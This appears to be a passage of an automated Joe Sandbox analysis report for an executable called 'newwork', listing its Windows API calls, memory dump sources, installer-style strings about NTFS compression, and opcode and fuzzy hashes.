                                                                                  • Part of subcall function 0042EC88: MoveFileExA.KERNEL32(00000000,00000000,00000001(MOVEFILE_REPLACE_EXISTING)), ref: 0042ECBD
                                                                                • GetLastError.KERNEL32(00000000,00475721,?,?,0049C1E0,00000000), ref: 0047560A
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: CountErrorFileLastMoveTick
                                                                                • String ID: $LoggedMsgBox returned an unexpected value. Assuming Cancel.$MoveFileEx
                                                                                • API String ID: 2406187244-2685451598
                                                                                • Opcode ID: b4e541c37b522712e9a51433fba2d6f7c47cca6c6c5b44fd3a0118cd85a505a9
                                                                                • Instruction ID: cfe7f312216358cbd0971b398f0cafde252de4893b1317a5ce8d70824cf78b76
                                                                                • Opcode Fuzzy Hash: b4e541c37b522712e9a51433fba2d6f7c47cca6c6c5b44fd3a0118cd85a505a9
                                                                                • Instruction Fuzzy Hash: 4D418570A006099BDB10EFA5D882AEF77B5FF48314F508537E408BB395D7789A058BA9
                                                                                APIs
                                                                                • GetDesktopWindow.USER32 ref: 00413D46
                                                                                • GetDesktopWindow.USER32 ref: 00413DFE
                                                                                  • Part of subcall function 00418EC0: 6FCFC6F0.COMCTL32(?,00000000,00413FC3,00000000,004140D3,?,?,0049B628), ref: 00418EDC
                                                                                  • Part of subcall function 00418EC0: ShowCursor.USER32(00000001,?,00000000,00413FC3,00000000,004140D3,?,?,0049B628), ref: 00418EF9
                                                                                • SetCursor.USER32(00000000,?,?,?,?,00413AF3,00000000,00413B06), ref: 00413E3C
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: CursorDesktopWindow$Show
                                                                                • String ID:
                                                                                • API String ID: 2074268717-0
                                                                                • Opcode ID: 48e3412c1a46991eea637d4b1b247886da5b7466a2ee9d80c19fa9edf3c8b710
                                                                                • Instruction ID: d0219f8535474b9b7e790bb207accfb6dce16a9ac66decbe361331da1304c66b
                                                                                • Opcode Fuzzy Hash: 48e3412c1a46991eea637d4b1b247886da5b7466a2ee9d80c19fa9edf3c8b710
                                                                                • Instruction Fuzzy Hash: 91412C75600210AFC710DF2AFA84B56B7E1EB65329B16817BE405CB365DB38DD81CF98
                                                                                APIs
                                                                                • GetModuleFileNameA.KERNEL32(00400000,?,00000100), ref: 00408A75
                                                                                • LoadStringA.USER32(00400000,0000FF9E,?,00000040), ref: 00408AE4
                                                                                • LoadStringA.USER32(00400000,0000FF9F,?,00000040), ref: 00408B7F
                                                                                • MessageBoxA.USER32(00000000,?,?,00002010), ref: 00408BBE
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: LoadString$FileMessageModuleName
                                                                                • String ID:
                                                                                • API String ID: 704749118-0
                                                                                • Opcode ID: ede814ba8b2c905ab74f80468cae56b5ab65d73ed59c96bbcc76a4520df8398d
                                                                                • Instruction ID: 7d65b0a5aa49ad722f3f3263bbe29e3330acee4661d9e2153cfe083702b22da2
                                                                                • Opcode Fuzzy Hash: ede814ba8b2c905ab74f80468cae56b5ab65d73ed59c96bbcc76a4520df8398d
                                                                                • Instruction Fuzzy Hash: 1F3123716083849AD370EB65C945BDF77D89B85704F40483FB6C8E72D1EB7859048B6B
                                                                                APIs
                                                                                • SendMessageA.USER32(00000000,000001A1,?,00000000), ref: 0044E90D
                                                                                  • Part of subcall function 0044CF50: SendMessageA.USER32(00000000,000001A0,?,00000000), ref: 0044CF82
                                                                                • InvalidateRect.USER32(00000000,00000000,00000001,00000000,000001A1,?,00000000), ref: 0044E991
                                                                                  • Part of subcall function 0042BBB4: SendMessageA.USER32(00000000,0000018E,00000000,00000000), ref: 0042BBC8
                                                                                • IsRectEmpty.USER32(?), ref: 0044E953
                                                                                • ScrollWindowEx.USER32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000006), ref: 0044E976
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: MessageSend$Rect$EmptyInvalidateScrollWindow
                                                                                • String ID:
                                                                                • API String ID: 855768636-0
                                                                                • Opcode ID: a4575d285c62c1c56b7686ad69dfdc5ef60a631fed5d3d1fc0705a1474777ead
                                                                                • Instruction ID: f7bad605b8f68185b4e834990bb8ca2287257270a928060092b59a923d315d7c
                                                                                • Opcode Fuzzy Hash: a4575d285c62c1c56b7686ad69dfdc5ef60a631fed5d3d1fc0705a1474777ead
                                                                                • Instruction Fuzzy Hash: E5114A71B0030067E650BA7B8C86B5B76C9AB88748F15083FB545EB387DE7DDD094299
                                                                                APIs
                                                                                • OffsetRect.USER32(?,?,00000000), ref: 00495988
                                                                                • OffsetRect.USER32(?,00000000,?), ref: 004959A3
                                                                                • OffsetRect.USER32(?,?,00000000), ref: 004959BD
                                                                                • OffsetRect.USER32(?,00000000,?), ref: 004959D8
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: OffsetRect
                                                                                • String ID:
                                                                                • API String ID: 177026234-0
                                                                                • Opcode ID: e6cd63ab1267e2bef36e0ea42f4f89ffcc49fa5b03609306a0fb63f812f5ac90
                                                                                • Instruction ID: 9409249b62c1188f54b5b62e2685c04785358b71117f53a2337039625fc08c68
                                                                                • Opcode Fuzzy Hash: e6cd63ab1267e2bef36e0ea42f4f89ffcc49fa5b03609306a0fb63f812f5ac90
                                                                                • Instruction Fuzzy Hash: 1121AEB6700701AFDB00DE69CD81E5BB7DAEFC4350F248A2AF944C3249D638ED048761
                                                                                APIs
                                                                                • GetCursorPos.USER32 ref: 00417260
                                                                                • SetCursor.USER32(00000000), ref: 004172A3
                                                                                • GetLastActivePopup.USER32(?), ref: 004172CD
                                                                                • GetForegroundWindow.USER32(?), ref: 004172D4
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: Cursor$ActiveForegroundLastPopupWindow
                                                                                • String ID:
                                                                                • API String ID: 1959210111-0
                                                                                • Opcode ID: 0325eb73ca892009698aa7541b5e3073a06fcfb7bd7d3fb361e05756697ccdec
                                                                                • Instruction ID: de3f0dc6b436800086b9427ec8ddd2ec86eeedce3a35093462374e80c8eda50e
                                                                                • Opcode Fuzzy Hash: 0325eb73ca892009698aa7541b5e3073a06fcfb7bd7d3fb361e05756697ccdec
                                                                                • Instruction Fuzzy Hash: C52183313086118AD720AFA9E945AE733F1EF44754B0544ABF8558B352DB3DDC82CB9E
                                                                                APIs
                                                                                • MulDiv.KERNEL32(?,00000008,?), ref: 004955F1
                                                                                • MulDiv.KERNEL32(?,00000008,?), ref: 00495605
                                                                                • MulDiv.KERNEL32(?,00000008,?), ref: 00495619
                                                                                • MulDiv.KERNEL32(?,00000008,?), ref: 00495637
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: b0bc83cb44cddb6cfb83e9cff79c84a8c4632dee95d4fc6912c32f85648e17c5
                                                                                • Instruction ID: b77f8f3c6746ea581d036ce488ab013aedd37a602364075716cddbfd1b85439e
                                                                                • Opcode Fuzzy Hash: b0bc83cb44cddb6cfb83e9cff79c84a8c4632dee95d4fc6912c32f85648e17c5
                                                                                • Instruction Fuzzy Hash: A5112E72604504ABCB40DEA9D8C4D9B7BECEF8D324B6441AAF908DB242D674ED408B68
                                                                                APIs
                                                                                • GetClassInfoA.USER32(00400000,0041F470,?), ref: 0041F4A1
                                                                                • UnregisterClassA.USER32(0041F470,00400000), ref: 0041F4CA
                                                                                • RegisterClassA.USER32(00499598), ref: 0041F4D4
                                                                                • SetWindowLongA.USER32(00000000,000000FC,00000000), ref: 0041F50F
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: Class$InfoLongRegisterUnregisterWindow
                                                                                • String ID:
                                                                                • API String ID: 4025006896-0
                                                                                • Opcode ID: 2789f09181fedf2aa8f29be774d1bfe7920984f559ea6f8e8637ed1726722249
                                                                                • Instruction ID: 7a0dc659497f48f9aad4428a0df7724adcaf244520b53866b591a9b3b5545ee4
                                                                                • Opcode Fuzzy Hash: 2789f09181fedf2aa8f29be774d1bfe7920984f559ea6f8e8637ed1726722249
                                                                                • Instruction Fuzzy Hash: F6011B72240104AADA10EBACED81E9B33999729314B11423BB615E72A2D6399C558BAC
                                                                                APIs
                                                                                • WaitForInputIdle.USER32(?,00000032), ref: 00454FA8
                                                                                • MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000000FF), ref: 00454FCA
                                                                                • GetExitCodeProcess.KERNEL32(?,?), ref: 00454FD9
                                                                                • CloseHandle.KERNEL32(?,00455006,00454FFF,?,?,?,00000000,?,?,004551DB,?,?,?,00000044,00000000,00000000), ref: 00454FF9
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: Wait$CloseCodeExitHandleIdleInputMultipleObjectsProcess
                                                                                • String ID:
                                                                                • API String ID: 4071923889-0
                                                                                • Opcode ID: 8aa0dd6ec5a68f6f7641eb82506f7728cd0b20fc7582fe19e2ee2bc87ac6724f
                                                                                • Instruction ID: ea90b2abd28d60bbe0c33bbe6d7a83e36ef454db8471bda6b5c19e9a906557d9
                                                                                • Opcode Fuzzy Hash: 8aa0dd6ec5a68f6f7641eb82506f7728cd0b20fc7582fe19e2ee2bc87ac6724f
                                                                                • Instruction Fuzzy Hash: B9012D31A006097FEB1097AA8C02F6FBBECDF49764F610127F904D72C2C5788D409A78
                                                                                APIs
                                                                                • FindResourceA.KERNEL32(00400000,?,00000000), ref: 0040D027
                                                                                • LoadResource.KERNEL32(00400000,72756F73,0040A7C8,00400000,00000001,00000000,?,0040CF84,00000000,?,00000000,?,?,0047CB58,0000000A,00000000), ref: 0040D041
                                                                                • SizeofResource.KERNEL32(00400000,72756F73,00400000,72756F73,0040A7C8,00400000,00000001,00000000,?,0040CF84,00000000,?,00000000,?,?,0047CB58), ref: 0040D05B
                                                                                • LockResource.KERNEL32(74536563,00000000,00400000,72756F73,00400000,72756F73,0040A7C8,00400000,00000001,00000000,?,0040CF84,00000000,?,00000000,?), ref: 0040D065
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: Resource$FindLoadLockSizeof
                                                                                • String ID:
                                                                                • API String ID: 3473537107-0
                                                                                • Opcode ID: f701ce4f04cb0ebdd1143b5585c75acb70ffd029a82b31343d3be87257736b7b
                                                                                • Instruction ID: ce77ce8360aa458f47a01e9b0563465317cd85cc21d7bcd45488e041df035c61
                                                                                • Opcode Fuzzy Hash: f701ce4f04cb0ebdd1143b5585c75acb70ffd029a82b31343d3be87257736b7b
                                                                                • Instruction Fuzzy Hash: 49F04F726056046F9B14EE59A881D5B77ECDE88268310013AF908E7286DA38DD018B68
                                                                                APIs
                                                                                • GetLastError.KERNEL32(?,00000000), ref: 004705F1
                                                                                Strings
                                                                                • Unsetting NTFS compression on file: %s, xrefs: 004705D7
                                                                                • Failed to set NTFS compression state (%d)., xrefs: 00470602
                                                                                • Setting NTFS compression on file: %s, xrefs: 004705BF
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: ErrorLast
                                                                                • String ID: Failed to set NTFS compression state (%d).$Setting NTFS compression on file: %s$Unsetting NTFS compression on file: %s
                                                                                • API String ID: 1452528299-3038984924
                                                                                • Opcode ID: 4a85a403c5f553919e8eb8264edf58c674aea38054a880eb2495f4adb197a451
                                                                                • Instruction ID: 452327faed6fd823952186a677ff1a78a18aba12ee86070aec797b5412e08bdc
                                                                                • Opcode Fuzzy Hash: 4a85a403c5f553919e8eb8264edf58c674aea38054a880eb2495f4adb197a451
                                                                                • Instruction Fuzzy Hash: A5018B71D09248A6CB04D7AD94512DDBBE49F4D314F44C5FFE459D7342DB780A088B9E
                                                                                APIs
                                                                                • GetLastError.KERNEL32(00000000,00000000), ref: 0046FE45
                                                                                Strings
                                                                                • Failed to set NTFS compression state (%d)., xrefs: 0046FE56
                                                                                • Unsetting NTFS compression on directory: %s, xrefs: 0046FE2B
                                                                                • Setting NTFS compression on directory: %s, xrefs: 0046FE13
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: ErrorLast
                                                                                • String ID: Failed to set NTFS compression state (%d).$Setting NTFS compression on directory: %s$Unsetting NTFS compression on directory: %s
                                                                                • API String ID: 1452528299-1392080489
                                                                                • Opcode ID: 01501a136b81c39b7c411191948b84cc59583678e1d21d505a98b8108a1a9e37
                                                                                • Instruction ID: 6c3eba688a3488f6cff2036d9eec8e6f632fba0cce39d579df3f4bd3b957a0ce
                                                                                • Opcode Fuzzy Hash: 01501a136b81c39b7c411191948b84cc59583678e1d21d505a98b8108a1a9e37
                                                                                • Instruction Fuzzy Hash: E5014421E0824856CB04D7ADE44129DBBA49F49304F4485BBA495E7253EB790A09879B
                                                                                APIs
                                                                                  • Part of subcall function 0042DE1C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,;H,?,00000001,?,?,00483BE3,?,00000001,00000000), ref: 0042DE38
                                                                                • RegDeleteValueA.ADVAPI32(?,00000000,?,00000002,00000000,?,?,00000000,0045B7AE,?,?,?,?,?,00000000,0045B7D5), ref: 00455DD8
                                                                                • RegCloseKey.ADVAPI32(00000000,?,00000000,?,00000002,00000000,?,?,00000000,0045B7AE,?,?,?,?,?,00000000), ref: 00455DE1
                                                                                • RemoveFontResourceA.GDI32(00000000), ref: 00455DEE
                                                                                • SendNotifyMessageA.USER32(0000FFFF,0000001D,00000000,00000000), ref: 00455E02
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: CloseDeleteFontMessageNotifyOpenRemoveResourceSendValue
                                                                                • String ID:
                                                                                • API String ID: 4283692357-0
                                                                                • Opcode ID: f8aea33aa1dfe48501da451cbaaab358c9a7ac193b9fd61d7dd35e15a1d684ec
                                                                                • Instruction ID: 71ccc6c4ad223293e5fa71c014565a1ca4f3f808124b73c5b0663eb55104ffd2
                                                                                • Opcode Fuzzy Hash: f8aea33aa1dfe48501da451cbaaab358c9a7ac193b9fd61d7dd35e15a1d684ec
                                                                                • Instruction Fuzzy Hash: 57F0BEB174070036EA10B6BAAC4BF2B26CC8F54745F10883ABA00EF2C3D97CDC04962D
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: ErrorLast$CountSleepTick
                                                                                • String ID:
                                                                                • API String ID: 2227064392-0
                                                                                • Opcode ID: dfa0650b41a5fbb69b4da717be5ba207ba5450cdb50d9376c11a56b5a3797e8a
                                                                                • Instruction ID: 56d8cd0ebf6ab4a4d31aad6ab38b951dee0ff9c0bbbb70c30f4e079d31b44593
                                                                                • Opcode Fuzzy Hash: dfa0650b41a5fbb69b4da717be5ba207ba5450cdb50d9376c11a56b5a3797e8a
                                                                                • Instruction Fuzzy Hash: C6E0ED6A30921149863131AE98CA6AF4D48CBC2324B28853FE08CE6283C89C4C0A867E
                                                                                APIs
                                                                                • GetCurrentProcess.KERNEL32(00000008,?,?,?,00000001,00000000,00000002,00000000,004812C8,?,?,?,?,?,00498CDB,00000000), ref: 0047820D
                                                                                • OpenProcessToken.ADVAPI32(00000000,00000008,?,?,?,00000001,00000000,00000002,00000000,004812C8,?,?,?,?,?,00498CDB), ref: 00478213
                                                                                • GetTokenInformation.ADVAPI32(00000008,00000012(TokenIntegrityLevel),00000000,00000004,00000008,00000000,00000008,?,?,?,00000001,00000000,00000002,00000000,004812C8), ref: 00478235
                                                                                • CloseHandle.KERNEL32(00000000,00000008,TokenIntegrityLevel,00000000,00000004,00000008,00000000,00000008,?,?,?,00000001,00000000,00000002,00000000,004812C8), ref: 00478246
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: ProcessToken$CloseCurrentHandleInformationOpen
                                                                                • String ID:
                                                                                • API String ID: 215268677-0
                                                                                • Opcode ID: 89672e1c1dad377db11468aaf314ccfc00159a4e206af17bba33db1213e8e157
                                                                                • Instruction ID: 91f0679cb69370e855683a510bc75a037ced8834772831ea40795c83ba0b1c60
                                                                                • Opcode Fuzzy Hash: 89672e1c1dad377db11468aaf314ccfc00159a4e206af17bba33db1213e8e157
                                                                                • Instruction Fuzzy Hash: D8F037716447007BD600E6B58C81E5B73DCEB44354F04493E7E98C71C1DA78DC089776
                                                                                APIs
                                                                                • GetLastActivePopup.USER32(?), ref: 0042424C
                                                                                • IsWindowVisible.USER32(?), ref: 0042425D
                                                                                • IsWindowEnabled.USER32(?), ref: 00424267
                                                                                • SetForegroundWindow.USER32(?), ref: 00424271
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: Window$ActiveEnabledForegroundLastPopupVisible
                                                                                • String ID:
                                                                                • API String ID: 2280970139-0
                                                                                • Opcode ID: d317456c615bf9008b67529b06aff5f9fae4f5f479d94640f2b11ca0dbd6cbb7
                                                                                • Instruction ID: 2c5ff33fc315f6eb6fab431e1453bcb0e66c5aaaa6596e28cc8dc28fd0b03a53
                                                                                • Opcode Fuzzy Hash: d317456c615bf9008b67529b06aff5f9fae4f5f479d94640f2b11ca0dbd6cbb7
